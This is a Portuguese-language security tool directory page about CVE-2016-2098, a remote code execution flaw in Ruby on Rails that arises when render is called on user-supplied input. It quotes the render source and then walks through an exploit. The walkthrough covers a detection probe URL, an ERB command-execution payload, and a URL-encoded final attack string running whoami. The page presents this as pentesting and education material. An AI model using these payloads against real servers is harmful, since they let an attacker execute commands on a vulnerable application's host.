Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2016-2098 — Vulnerabilidade de execução remota de código no Ruby-on-Rails ao usar render em dados fornecidos pelo usuário. | Kitploit
Ferramentas/GitHubGitHub/j4k0m/cve-2016-2098
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubj4k0m/cve-2016-2098

CVE-2016-2098

Vulnerabilidade de execução remota de código no Ruby-on-Rails ao usar render em dados fornecidos pelo usuário.

Ver Repositório
4há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2016-2098

Vulnerabilidade de execução remota de código no Ruby-on-Rails ao usar render em dados fornecidos pelo usuário.

Explicação:

Este problema vem do uso do método render em dados fornecidos pelo usuário.

O método render é normalmente usado para renderizar uma página a partir de um template, mas o método render também permite que desenvolvedores renderizem texto simples (plaintext) e até código inline (inline).

render function:

root@kitploit:~
# File actionpack/lib/abstract_controller/rendering.rb, line 23
def render(*args, &block)
  options = _normalize_render(*args, &block)
  rendered_body = render_to_body(options)
  if options[:html]
    _set_html_content_type
  else
    _set_rendered_content_type rendered_format
  end
  _set_vary_header
  self.response_body = rendered_body
end

Exemplo de Exploração:

URL alvo:

root@kitploit:~
http://example.com/?view=test

Exploração:

root@kitploit:~
http://example.com/?view[inline]=OK

Se 'OK' aparecer no código-fonte, então a aplicação web é vulnerável ao CVE-2016-2098.

Execução Remota de Código

root@kitploit:~
<%= %x('[CMD]') %>

Podemos substituir CMD pelo comando que queremos executar.

root@kitploit:~
<%= %x('whoami') %>

Após codificação URL:

root@kitploit:~
%3C%25=%20%25x(whoami)%20%25%3E

Final:

root@kitploit:~
http://example.com/?view[inline]=%3C%25=%20%25x(whoami)%20%25%3E

Recursos:

  • https://guides.rubyonrails.org/layouts_and_rendering.html
Baixar ferramenta